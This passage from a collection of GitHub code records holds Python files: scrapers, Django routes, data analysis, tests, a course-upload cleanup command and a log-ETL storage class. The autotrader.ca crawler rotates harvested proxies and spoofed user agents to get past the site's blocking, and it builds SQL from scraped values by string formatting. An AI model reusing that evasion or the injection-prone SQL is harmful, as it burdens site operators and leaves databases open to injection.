print(f'aは{a}、bは{b}、cは{c}、sheet_numは{sheet_num}')\r\n print(f'day1={day1_pv}、day2={day2_pv}')\r\n day1_pv = int(day1_pv)\r\n day2_pv = int(day2_pv)\r\n day2_day1 = day2_pv - day1_pv\r\n worksheet2.update_cell(sheet_num, c, day2_day1)\r\n date_data = str(day1)+'~'+str(day2)\r\n worksheet2.update_cell(1, c, date_data)\r\n sheet_num -= 1\r\n sleep(1)\r\n except:\r\n break\r\n\r\n date_number += 1\r\n driver.quit()\r\n\r\ncheck_pv()\r\n#schedule.every().day.at('14:50').do(check_pv)\r\n#schedule.every(3).minutes.do(check_pv)\r\n# while True:\r\n# schedule.run_pending()\r\n# sleep(1)\r\n","repo_name":"Mr-SuperInsane/WP2V","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"75151447208","text":"\nfrom django.conf.urls import url,include\nfrom . import views\nurlpatterns = [\nurl(r'author/', views.authorView.as_view(),name='author'),\nurl(r'authordetail/(?P[0-9]+)',views.authordetail.as_view(),name='authordetail'),\n url(r'bookdetail/(?P[0-9]+)',views.bookdetail.as_view(),name='bookdetail'),\n\nurl(r'',views.Index.as_view(),name='book'),\n\n]\n","repo_name":"krishnapriya-mk/Library-app","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26322609027","text":"import queue\nfrom bs4 import BeautifulSoup\nimport mysql.connector\nimport os\nimport time\nfrom threading import Thread, Lock\nfrom datetime import datetime\nimport logging\nimport requests\nimport argparse\nimport random\nimport re\n\ndef get_q(rng):\n\n\tQ = queue.Queue(1000)\n\tfor page in range(0,max_index*100,100):\n\t\turl = \"https://www.autotrader.ca/cars/?rcp=100&rcs={}&srt=33&pRng={}%2C{}&prx=-1&loc=V3J%203S9&hprc=\\\n\t\t\tTrue&wcp=True&sts=New-Used&inMarket=advancedSearch\\\n\t\t\t\".format(page,price_range[rng][0],price_range[rng][1])\n\t\tQ.put(url)\n\n\treturn Q\n\ndef get_proxies(num, wait):\n\n\tos.system('> proxies.txt')\n\tos.system('timeout '+str(wait)+'s '+'proxybroker find --types HTTPS --lvl High --countries US CA --strict -l '+ str(num) +' > proxies.txt')\n\n\twith open('proxies.txt','r') as proxy_file:\n\t\tproxy_list = proxy_file.readlines()\n\n\treturn proxy_list\n\ndef parse_proxies(proxy_list, protocol):\n\tparsed_list = list();\n\tfor proxy in proxy_list:\n\t\tproxy.strip()\n\t\tindex = proxy.find(']')\n\t\tparsed_list.append(protocol+'://'+proxy[index+2:len(proxy)-2])\n\tprint(parsed_list)\n\treturn parsed_list\n\nclass Crawler(Thread):\n\t#class variables\n\theaders = ['Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n\t\t 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',\n\t\t 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',\n\t\t 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15]']\n\n\tconn = mysql.connector.connect(user=os.environ['USER_NAME'], passwd=os.environ['PASSWORD'], host=os.environ['HOST_NAME'],database=os.environ['DATABASE'])\n\tproxies = None\n\ttimout = None\n\n\tdef __init__(self, outside_proxy, main_Q, worker_Q, timeout):\n\t\tThread.__init__(self)\n\t\t#instance variables\n\t\t#connection/page objects\n\t\tself.req = None\n\t\tself.content = None\n\t\tself.bsObj = None\n\t\tself.path = None\n\t\tself.debug = None\n\t\tself.init_proxies(outside_proxy)\n\t\tself.init_timeout(timeout)\n\t\t#page structures\n\t\tself.bsParse = []\n\t\tself.links = []\n\t\tself.vehicles = []\n\t\t#proxy structures\n\t\tself.main_Q = main_Q\n\t\tself.worker_Q = worker_Q\n\n\tdef gather_links(self):\n\n\t\tself.bsParse = self.bsObj.findAll('div', {'class':'listing-details organic'})\n\t\tfor tag in self.bsParse:\n\t\t\tif 'href' in tag.a.attrs: self.links.append('https://www.autotrader.ca'+ tag.a.attrs['href'])\n\n\tdef init_timeout(self, timeout):\n\t\tCrawler.timeout = timeout\n\n\tdef init_proxies(self, outside_proxy):\n\t\tCrawler.proxies = outside_proxy\n\n\tdef update_request(self,link):\n\n\t\tself.req = None\n\t\twhile str(self.req) != '':\n\n\t\t\ttime.sleep(Crawler.timeout)\n\t\t\ttry:\n\t\t\t\tproxy = random.choice(Crawler.proxies)\n\t\t\t\tself.req = requests.get(link,headers={'user-agent':random.choice(self.headers)}, proxies={'https':proxy}, timeout=10)\n\n\t\t\texcept (requests.exceptions.Timeout, requests.exceptions.ConnectTimeout):\n\t\t\t\tprint(\"{} connection timeout using ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\tif proxy in Crawler.proxies:\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\texcept requests.exceptions.RequestException:\n\t\t\t\tprint(\"{} other connection issue using ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\tif proxy in Crawler.proxies:\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\telse:\n\t\t\t\tself.content = self.req.content\n\t\t\t\tself.bsObj = BeautifulSoup(self.content,'lxml')\n\n\t\t\t\tif len(self.bsObj.findAll('head',attrs={'name':'ROBOTS'}))!=0:\n\t\t\t\t\tprint(\"{} blacklisted ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\t\t\tself.req = None\n\n\t\t\t\tif len(str(self.content)) <= 1000: self.req = None\n\n\tdef check_page_index(self):\n\t\t#get current page\n\t\tself.bsParse = str(self.bsObj.findAll('script',limit=25)[18:25])\n\t\tstart_index = self.bsParse.rfind('\"CurrentPage\":')\n\t\tcurrent_page = self.bsParse[start_index+15:start_index+18]\n\t\t#get max page\n\t\tstart_index = self.bsParse.rfind('\"MaxPage\":')\n\t\tmax_page = self.bsParse[start_index+11:start_index+14]\n\n\t\tif not current_page or not max_page:\n\t\t\tprint('------------------- NO CURRENT OR MAX PAGE -------------------')\n\t\t\tlogging.warning(\"NO CURRENT OR MAX PAGE\")\n\t\t\tprint('--------------------------------------------------------------')\n\t\t\treturn False\n\t\telse:\n\t\t\tif current_page[-1]==',': current_page = current_page[:-1]\n\n\t\tif current_page[0] == '0':\n\t\t\t#Past last page CurrentPage and Lastpage is 0\n\t\t\treturn True\n\t\telif int(current_page) < int(max_page):\n\t\t\tprint(self.path)\n\t\t\tprint('{} {}'.format(current_page,max_page))\n\t\t\treturn False\n\t\telse:\n\t\t\tprint('{} {}'.format(current_page,max_page))\n\t\t\treturn True\n\n\tdef update_db(self, data):\n\n\t\tcursor = self.conn.cursor()\n\t\tfor row in data:\n\n\t\t\tcur_time = datetime.now()\n\t\t\tformated = cur_time.strftime('%Y-%m-%d %H:%M:%S')\n\t\t\trow['full vehicle'] = row['make']+' '+row['model']+' '+row['year']\n\n\t\t\tvalues = (row['adID'],row['adType'],row['condition'], row['make'], row['model'], row['price'], row['province'],\n\t\t\trow['city'], row['year'], row['kilometres'], row['exterior colour'], row['fuel type'], row['body type'], row['full vehicle'])\n\n\t\t\tsql_autotrader = \"\"\"INSERT INTO main(adID, adType, `condition`, make, model, price, province, city, `year`, kilometers, exterior_color, fuel_type, body_type, full_vehicle)\n\t\t\t\t\t\t\t\tVALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s');\"\"\"%(values)\n\n\t\t\tsql_turnover = \"\"\"INSERT INTO time(adID, time_entered, time_updated)\n\t\t\t\t\t\t\t VALUES('%s','%s',%s)\n\t\t\t\t\t\t\t ON DUPLICATE KEY UPDATE time_updated = '%s';\"\"\"%(row['adID'],formated,'NULL',formated)\n\n\t\t\tsql_vehicle_image = \"\"\"\n\t\t\t\t\t\t\t\tINSERT IGNORE INTO vehicle_image(full_vehicle, image_path) VALUES('%s',NULL);\n\t\t\t\t\t\t\t\t\"\"\"%(row['full vehicle'])\n\n\t\t\tsql_adjusted_price = \"\"\"\n\t\t\t\t\t\t\t\tINSERT INTO price_change(adID, adjusted_price, time_updated)\n\t\t\t\t\t\t\t\tVALUES('%s', '%s', '%s')\n\t\t\t\t\t\t\t\tON DUPLICATE KEY UPDATE adjusted_price = '%s', time_updated = '%s';\"\"\"%(row['adID'], row['price'], formated, row['price'], formated)\n\n\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_autotrader)\n\t\t\t\tself.conn.commit()\n\t\t\texcept:\n\t\t\t\tself.conn.rollback()\n\t\t\t\ttry:\n\t\t\t\t\tcursor.execute(sql_adjusted_price)\n\t\t\t\texcept:\n\t\t\t\t\tself.conn.rollback()\n\t\t\telse:\n\t\t\t\tcursor.execute(sql_vehicle_image)\n\t\t\t\tself.conn.commit()\n\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_turnover)\n\t\t\t\tself.conn.commit()\n\t\t\texcept:\n\t\t\t\tself.conn.rollback()\n\n\t\tcursor.close()\n\n\tdef gather_details(self):\n\n\t\tself.vehicles = []\n\n\t\t#TODO: Include error handling for empty links\n\t\tfor link in self.links:\n\n\t\t\tvehicle_details = {'adID':'','adType':'','condition':'','make':'','model':'','price':'','province':'','city':'',\n\t\t\t\t\t'year':'','kilometres':'','exterior colour':'','fuel type':'','body type':''}\n\n\t\t\tself.update_request(link)\n\t\t\t#collect data from gtmManager.initializeDataLayer\n\t\t\tself.bsParse = self.bsObj.findAll('script',limit=3)\n\n\t\t\ttry:\n\t\t\t\tdetails = re.sub('\"','',self.bsParse[2].text)\n\t\t\texcept:\n\t\t\t\tlogging.warning(\"gtmManager.initializeDataLayer method is not available in source for this listing at url: {}\".format(link))\n\t\t\t\tcontinue\n\n\t\t\tdetails = re.split(',|:|{',details)\n\t\t\tdetails = details[:details.index('lists')] + details[details.index('city'):]\n\t\t\tdetails[details.index('city')+1] = re.sub('}','',details[details.index('city')+1])\n\n\t\t\t#collect remaining data from id=\"vdp-specs-content\"\n\t\t\tself.bsParse = self.bsObj.findAll('div',{'id':'vdp-specs-content'})\n\t\t\ttry:\n\t\t\t\tself.bsParse = re.sub('\\\\n|
|
|',' ',str(self.bsParse[0]).lower())\n\t\t\texcept:\n\t\t\t\tlogging.warning('Extra details id=\"vdp-specs-content\" are not available in source for this listing at url: {}'.format(link))\n\t\t\t\tcontinue\n\n\t\t\tself.bsParse = re.split('
|
|
',self.bsParse)\n\t\t\tfor item in range(len(self.bsParse)): self.bsParse[item] = self.bsParse[item].strip()\n\n\t\t\tdetails = details + self.bsParse\n\t\t\t#add to vehicle_details dict\n\t\t\tfor key in vehicle_details:\n\t\t\t\tindex = details.index(key)\t\t\t\t\t#TODO: error handling on .index()\n\t\t\t\tvehicle_details[key] = details[index+1]\n\n\t\t\tself.vehicles.append(vehicle_details)\n\n\t\tself.links = []\n\t\treturn self.vehicles\n\n\tdef run(self):\n\n\t\tlast_page = False\n\t\tprint('starting {} ...'.format(self.getName()))\n\t\tself.path = Q.get()\n\t\tself.update_request(self.path)\n\n\t\twhile (last_page==False):\n\n\t\t\tself.gather_links()\n\t\t\tprint('{} gathered link details ...'.format(self.getName()))\n\t\t\tvehicles = self.gather_details()\n\t\t\tprint('{} gathered vehicle details ...'.format(self.getName()))\n\n\t\t\tdb_lock.acquire()\n\t\t\tprint('{} acquired the lock ...'.format(self.getName()))\n\t\t\tself.update_db(vehicles)\n\t\t\tdb_lock.release()\n\t\t\tprint('{} released the lock ...'.format(self.getName()))\n\n\t\t\t#Rotate fresh proxies\n\t\t\t#-----------------------------------------------------------------\n\t\t\tif (len(Crawler.proxies) <= 10) and (proxy_lock.acquire(False)):\n\t\t\t\tprint('{} rotating fresh proxies ...'.format(self.getName()))\n\t\t\t\tlogging.info('{} ROTATING FRESH PROXIES'.format(self.getName()))\n\t\t\t\tself.main_Q.put(True)\n\t\t\t\tfresh_proxies = self.worker_Q.get()\n\t\t\t\tCrawler.proxies += fresh_proxies\n\t\t\t\tproxy_lock.release()\n\t\t\t#-----------------------------------------------------------------\n\n\t\t\tself.path = Q.get()\n\t\t\tself.update_request(self.path)\n\n\t\t\tlast_page = self.check_page_index()\n\t\t\t#stop main loop from listening for fresh proxies\n\t\t\tif last_page: self.main_Q.put(False)\n\t\t\tprint('{} last page is {} ...'.format(self.getName(),last_page))\n\n\nif __name__ == '__main__':\n\t'''\n\tautotrader.ca search returns a maximum of 1000 indices when 100 postiings per page is set. By breaking the search\n\tinto price intervals, this allows the search to stay below the 1000 index max.\n\t'''\n\t#parse command line arguments\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\"-threads\",\"--threads\", type=int, default=10)\n\tparser.add_argument(\"-proxy_total\",\"--proxy_total\", type=int, default=60)\n\tparser.add_argument(\"-proxy_refresh\",\"--proxy_refresh\", type=int, default=30)\n\tparser.add_argument(\"-proxy_wait\",\"--proxy_wait\", type=int, default=30)\n\tparser.add_argument(\"-timeout\",\"--timeout\", type=int, default=0)\n\n\targs = parser.parse_args()\n\n\t#global variables\n\tprice_range = [(1001,10000),(10001,20000),(20001,30000),(30001,40000),(40001,50000),(50001,60000),\n\t\t\t\t\t(60001,70000),(70001,80000),(80001,90000),(90001,100000),(100001,200000),(200001,2000000)]\n\n\tmax_index = 1000\n\tnum_proxies = args.proxy_total\n\tcycled_proxies = args.proxy_refresh\n\ttimeout = args.timeout\n\tproxy_wait = args.proxy_wait\n\tset_threads = args.threads\n\tthreads,proxies = [],[]\n\tdb_lock = Lock()\n\tproxy_lock = Lock()\n\tmain_Q = queue.Queue()\n\tworker_Q = queue.Queue()\n\tlogging.basicConfig(filename='error.log',level=logging.INFO,format='%(asctime)s:%(threadName)s:%(levelname)s:%(message)s')\n\n\t#main loop\n\tlogging.info(\"STARTING NEW ITERATION\")\n\tfor current_range in range(len(price_range)):\n\t\tprint('-----------------------------------------------------------------------------')\n\t\tprint('populating queue for range {} ...'.format(price_range[current_range]))\n\t\tprint('-----------------------------------------------------------------------------')\n\t\tQ = get_q(current_range)\n\t\tprint('retrieving proxies ...')\n\t\tprint('-----------------------------------------------------------------------------')\n\n\t\twhile len(proxies)= 2017][\"Id\"].count())\nten_or_more_games_factor = of_total_count(dfg_gc[dfg_gc[\"count\"] >= 10].count()[\"count\"])\nfifty_or_more_games_factor = of_total_count(dfg_gc[dfg_gc[\"count\"] >= 50].count()[\"count\"])\n\nprint(\"Currently crawled users: {}\".format(total_count))\nprint(\"{}% have provided a real name\".format(real_name_factor))\nprint(\"{}% have set a country\".format(country_factor))\nprint(\"{}% provided a city and state additionally to the country\".format(city_state_country_factor))\nprint(\"{}% of the crawled users have set their profile to private\".format(private_factor))\nprint(\"{}% of the crawled users are active (Logged in at least once this year)\".format(active_account_factor))\nprint(\"{}% have 10 games or more\".format(ten_or_more_games_factor))\nprint(\"{}% have 50 games or more\".format(fifty_or_more_games_factor))\n\n# Calculate graph data and display graphs\n\n# Game count\n\n# dfg_gc[\"count\"] = pd.cut(dfg_gc[\"count\"], [0, 1, 10, 25, 50, 100, 500, 30000],\n# labels=[\"0\", \"1 - 9\", \"10 - 24\", \"25 - 49\", \"50 - 99\", \"100 - 499\", \"500 +\"])\n# ax = sns.countplot(x=dfg_gc[\"count\"])\n# ax.set(xlabel=\"Game count\", ylabel=\"Number of players\")\n\n\n# Friend count\n\ndff_gc[\"friendcount\"] = pd.cut(dff_gc[dff_gc[\"friendcount\"] <= 50], [1, 50, 100, 150, 200, 250, 300, 350, 400, 999999],\n labels=[\"1 - 49\", \"50 - 99\", \"100 - 149\", \"150 - 199\", \"200 - 249\", \"250 - 299\",\n \"300 - 349\", \"350 - 399\", \"400+\"])\n\naxf = sns.countplot(x=dff_gc[\"friendcount\"])\naxf.set(xlabel=\"Friend count\", ylabel=\"Number of players\")\nfor item in ([axf.title, axf.xaxis.label, axf.yaxis.label] +\n axf.get_xticklabels() + axf.get_yticklabels()):\n item.set_fontsize(20)\nplt.show()\n","repo_name":"shiaky/mining_steam","sub_path":"code/data_explorer.py","file_name":"data_explorer.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"5379032926","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom sorting_searching.peak_element import PeakElement\n\nclass TestPeakElement(unittest.TestCase):\n def setUp(self):\n self.func = PeakElement()\n\n def test_1(self):\n nums = [1,2,3,1]\n expected = 2\n self.assertEqual(self.func.findPeakElement(nums), expected)\n\n def test_2(self):\n nums = [1,2,1,3,5,6,4]\n expected = [1, 5]\n self.assertIn(self.func.findPeakElement(nums), expected)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/sorting_searching_test/test_peak_element.py","file_name":"test_peak_element.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20714453982","text":"#!/usr/bin/env python3\n#coding=utf-8\nimport os, sys\n\n\nDIR_UTILIDADES=\"..\" + os.sep + \"utilidades\" + os.sep + \"src\"\nprint (DIR_UTILIDADES)\n\n\nsys.path.insert(0, DIR_UTILIDADES)\nfrom utilidades.ficheros.GestorFicheros import GestorFicheros\ngf=GestorFicheros()\n\ngf.ejecutar_comando(\"./descargador_html.py\", \"\")\ngf.ejecutar_comando(\"./procesador_centros.py\", \">\", \"centros_region.sql\")\ngf.ejecutar_comando (\"cat centros_region.sql\", \"|\", \"sqlite3 ../../docencia.db\")\n","repo_name":"OscarMaestre/pruebas_proceso","sub_path":"descargador_html/dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20556580579","text":"# coding: utf-8\n\n\"\"\"\nManagement command to clean up any old files in the oppia uploads directory\n\"\"\"\nimport os\nimport shutil\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom oppia.models import Course\n\n\nclass Command(BaseCommand):\n help = \"Cleans up any old files in the oppia uploads and courses directory\"\n\n def handle(self, *args, **options):\n self.remove_no_matching_courses()\n self.remove_courses_no_file()\n self.remove_old_expanded_folders()\n\n def remove_no_matching_courses(self):\n \"\"\"\n Remove files that don't have matching courses\n \"\"\"\n files = os.listdir(settings.COURSE_UPLOAD_DIR)\n for filename in files:\n if filename.endswith(\".zip\"):\n # find out if it's a live course file\n courses = Course.objects.filter(filename=filename)\n if courses.count() == 0:\n # delete the file\n os.remove(os.path.join(settings.COURSE_UPLOAD_DIR,\n filename))\n self.stdout.write(\"Removed: \" + filename)\n\n def remove_courses_no_file(self):\n \"\"\"\n Flag up courses that don't have files\n \"\"\"\n courses = Course.objects.all()\n for course in courses:\n if not os.path.isfile(os.path.join(settings.COURSE_UPLOAD_DIR,\n course.filename)):\n self.stdout \\\n .write(\"FILE MISSING: %s for %s \" % (course.filename,\n course.title))\n\n def remove_old_expanded_folders(self):\n \"\"\"\n Remove old expanded folders from media/courses\n \"\"\"\n try:\n files = os.listdir(os.path.join(settings.MEDIA_ROOT, 'courses'))\n for filename in files:\n if os.path.isdir(\n os.path.join(settings.MEDIA_ROOT,\n 'courses',\n filename)):\n courses = Course.objects.filter(shortname=filename)\n if courses.count() == 0:\n shutil.rmtree(os.path.join(settings.MEDIA_ROOT,\n 'courses',\n filename))\n self.stdout.write(\"Removed: \" + filename)\n except FileNotFoundError: # dir doesn;t exsit\n pass\n","repo_name":"DigitalCampus/django-oppia","sub_path":"oppia/management/commands/cleanup_uploads.py","file_name":"cleanup_uploads.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"}
+{"seq_id":"29582603882","text":"import copy\nfrom typing import Union\n\nfrom django.core.cache import cache\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.api import TransferApi\nfrom apps.exceptions import ValidationError, ApiResultError\nfrom apps.log_databus.constants import BKDATA_ES_TYPE_MAP, EtlConfig, FIELD_TEMPLATE, CACHE_KEY_CLUSTER_INFO\nfrom apps.log_databus.exceptions import EtlParseTimeFieldException, HotColdCheckException\nfrom apps.log_databus.handlers.collector_scenario import CollectorScenario\nfrom apps.log_databus.models import CollectorConfig, CollectorPlugin\nfrom apps.log_databus.utils.es_config import get_es_config\nfrom apps.log_search.constants import FieldBuiltInEnum, FieldDataTypeEnum\nfrom apps.utils import is_match_variate\n\n\nclass EtlStorage(object):\n \"\"\"\n 清洗入库\n \"\"\"\n\n # 子类需重载\n etl_config = None\n separator_node_name = \"bk_separator_object\"\n\n @classmethod\n def get_instance(cls, etl_config=None):\n mapping = {\n EtlConfig.BK_LOG_TEXT: \"BkLogTextEtlStorage\",\n EtlConfig.BK_LOG_JSON: \"BkLogJsonEtlStorage\",\n EtlConfig.BK_LOG_DELIMITER: \"BkLogDelimiterEtlStorage\",\n EtlConfig.BK_LOG_REGEXP: \"BkLogRegexpEtlStorage\",\n }\n try:\n etl_storage = import_string(\n \"apps.log_databus.handlers.etl_storage.{}.{}\".format(etl_config, mapping.get(etl_config))\n )\n return etl_storage()\n except ImportError as error:\n raise NotImplementedError(f\"{etl_config} not implement, error: {error}\")\n\n @classmethod\n def get_etl_config(cls, result_table_config, default=\"bk_log_text\"):\n \"\"\"\n 根据RT表配置返回etl_config类型\n \"\"\"\n separator_node_action = result_table_config.get(\"option\", {}).get(\"separator_node_action\")\n return {\"regexp\": \"bk_log_regexp\", \"delimiter\": \"bk_log_delimiter\", \"json\": \"bk_log_json\"}.get(\n separator_node_action, default\n )\n\n def etl_preview(self, data, etl_params) -> list:\n \"\"\"\n 字段提取预览\n :param data: 日志原文\n :param etl_params: 字段提取参数\n :return: 字段列表 list\n \"\"\"\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_bkdata_etl_config(self, fields, etl_params, built_in_config):\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_result_table_config(self, fields, etl_params, built_in_config, es_version=\"5.X\"):\n \"\"\"\n 配置清洗入库策略,需兼容新增、编辑\n \"\"\"\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_result_table_fields(self, fields, etl_params, built_in_config, es_version=\"5.X\"):\n \"\"\"\n META\n \"\"\"\n # field_list\n field_list = built_in_config.get(\"fields\", [])\n etl_flat = etl_params.get(\"etl_flat\", False)\n\n # 是否保留原文\n if etl_params.get(\"retain_original_text\"):\n field_list.append(\n {\n \"field_name\": \"log\",\n \"field_type\": \"string\",\n \"tag\": \"metric\",\n \"alias_name\": \"data\",\n \"description\": \"original_text\",\n \"option\": {\"es_type\": \"text\", \"es_include_in_all\": True}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"text\"},\n }\n )\n\n # 默认使用上报时间做为数据时间\n time_field = built_in_config[\"time_field\"]\n built_in_keys = FieldBuiltInEnum.get_choices()\n\n etl_field_index = 1\n clustering_default_fields = self._get_log_clustering_default_fields()\n for field in fields:\n # 当在聚类场景的时候 不做下面的format操作\n if etl_flat and field[\"field_name\"] in clustering_default_fields:\n field_list.append(field)\n continue\n # 过滤掉删除的字段\n if field[\"is_delete\"]:\n continue\n\n # 设置字段的来源与目标存储\n source_field = field[\"field_name\"]\n target_field = field[\"field_name\"]\n if field.get(\"alias_name\") and self.etl_config in [EtlConfig.BK_LOG_JSON]:\n target_field = field[\"alias_name\"]\n\n if target_field.lower() in built_in_keys:\n raise ValidationError(_(\"字段不能与标准字段重复\") + f\":{target_field}\")\n\n if not is_match_variate(target_field):\n raise ValidationError(_(\"字段名不符合变量规则\"))\n\n # option, 非时间字段的option里的time_zone和time_format都为\"\", 不需要入库\n field_option = {k: v for k, v in field.get(\"option\", {}).items() if k not in [\"time_zone\", \"time_format\"]}\n field_option[\"field_index\"] = etl_field_index\n etl_field_index += 1\n\n # ES_TYPE\n field_option[\"es_type\"] = FieldDataTypeEnum.get_es_field_type(\n field[\"field_type\"], is_analyzed=field[\"is_analyzed\"]\n )\n if field[\"is_analyzed\"] and field.get(\"option\", {}).get(\"es_analyzer\"):\n field_option[\"es_analyzer\"] = field[\"option\"][\"es_analyzer\"]\n\n # ES_INCLUDE_IN_ALL\n if field[\"is_analyzed\"] and es_version.startswith(\"5.\"):\n field_option[\"es_include_in_all\"] = True\n\n # ES_DOC_VALUES\n field_option[\"es_doc_values\"] = field[\"is_dimension\"]\n\n if not etl_flat:\n # REAL_PATH\n field_option[\"real_path\"] = f\"{self.separator_node_name}.{source_field}\"\n\n # 时间字段处理\n if field[\"is_time\"]:\n time_field[\"alias_name\"] = source_field\n time_field[\"option\"][\"real_path\"] = field_option[\"real_path\"]\n time_field[\"option\"][\"time_zone\"] = field[\"option\"][\"time_zone\"]\n time_field[\"option\"][\"time_format\"] = field[\"option\"][\"time_format\"]\n time_field[\"option\"][\"field_index\"] = field_option[\"field_index\"]\n # 删除原时间字段配置\n field_option[\"es_doc_values\"] = False\n\n # 加入字段列表\n field_list.append(\n {\n \"field_name\": target_field,\n \"field_type\": FieldDataTypeEnum.get_meta_field_type(field_option[\"es_type\"]),\n \"tag\": \"dimension\" if field_option.get(\"es_doc_values\", True) else \"metric\",\n \"description\": field.get(\"description\"),\n \"option\": field_option,\n }\n )\n\n field_list.append(time_field)\n return {\"fields\": field_list, \"time_field\": time_field}\n\n def update_or_create_result_table(\n self,\n instance: Union[CollectorConfig, CollectorPlugin],\n table_id: str,\n storage_cluster_id: int,\n retention: int,\n allocation_min_days: int,\n storage_replies: int,\n fields: list = None,\n etl_params: dict = None,\n es_version: str = \"5.X\",\n hot_warm_config: dict = None,\n es_shards: int = settings.ES_SHARDS,\n index_settings: dict = None,\n ):\n \"\"\"\n 创建或更新结果表\n :param instance: 采集项配置/采集插件\n :param table_id: 结果表ID\n :param storage_cluster_id: 存储集群id\n :param retention: 数据保留时间\n :param allocation_min_days: 执行分配的等待天数\n :param storage_replies: 存储副本数量\n :param fields: 字段列表\n :param etl_params: 清洗配置\n :param es_version: es\n :param hot_warm_config: 冷热数据配置\n :param es_shards: es分片数\n :param index_settings: 索引配置\n \"\"\"\n from apps.log_databus.handlers.collector import build_result_table_id\n\n # ES 配置\n es_config = get_es_config(instance.get_bk_biz_id())\n\n # 时间格式\n date_format = es_config[\"ES_DATE_FORMAT\"]\n\n # ES-分片数\n instance.storage_shards_nums = es_shards\n\n # ES-副本数\n instance.storage_replies = storage_replies\n\n # 需要切分的大小阈值,单位(GB)\n if not instance.storage_shards_size:\n instance.storage_shards_size = es_config[\"ES_SHARDS_SIZE\"]\n slice_size = instance.storage_shards_nums * instance.storage_shards_size\n\n # index分片时间间隔,单位(分钟)\n slice_gap = es_config[\"ES_SLICE_GAP\"]\n\n # ES兼容—mapping设置\n param_mapping = {\n \"dynamic_templates\": [\n {\n \"strings_as_keywords\": {\n \"match_mapping_type\": \"string\",\n \"mapping\": {\"norms\": \"false\", \"type\": \"keyword\"},\n }\n }\n ],\n }\n if es_version.startswith(\"5.\"):\n param_mapping[\"_all\"] = {\"enabled\": True}\n param_mapping[\"include_in_all\"] = False\n\n params = {\n \"bk_data_id\": instance.bk_data_id,\n # 必须为 库名.表名\n \"table_id\": build_result_table_id(instance.get_bk_biz_id(), table_id),\n \"is_enable\": True,\n \"table_name_zh\": instance.get_name(),\n \"is_custom_table\": True,\n \"schema_type\": \"free\",\n \"default_storage\": \"elasticsearch\",\n \"default_storage_config\": {\n \"cluster_id\": storage_cluster_id,\n \"storage_cluster_id\": storage_cluster_id,\n \"retention\": retention,\n \"date_format\": date_format,\n \"slice_size\": slice_size,\n \"slice_gap\": slice_gap,\n \"mapping_settings\": param_mapping,\n \"index_settings\": {\n \"number_of_shards\": instance.storage_shards_nums,\n \"number_of_replicas\": instance.storage_replies,\n },\n },\n \"is_time_field_only\": True,\n \"bk_biz_id\": instance.get_bk_biz_id(),\n \"label\": instance.category_id,\n \"option\": {},\n \"field_list\": [],\n \"warm_phase_days\": 0,\n \"warm_phase_settings\": {},\n \"is_sync_db\": False, # ES的index创建,不做同步创建,走异步任务执行\n }\n index_settings = index_settings or {}\n params[\"default_storage_config\"][\"index_settings\"].update(index_settings)\n\n # 是否启用冷热集群\n if allocation_min_days:\n if not hot_warm_config or not hot_warm_config.get(\"is_enabled\"):\n # 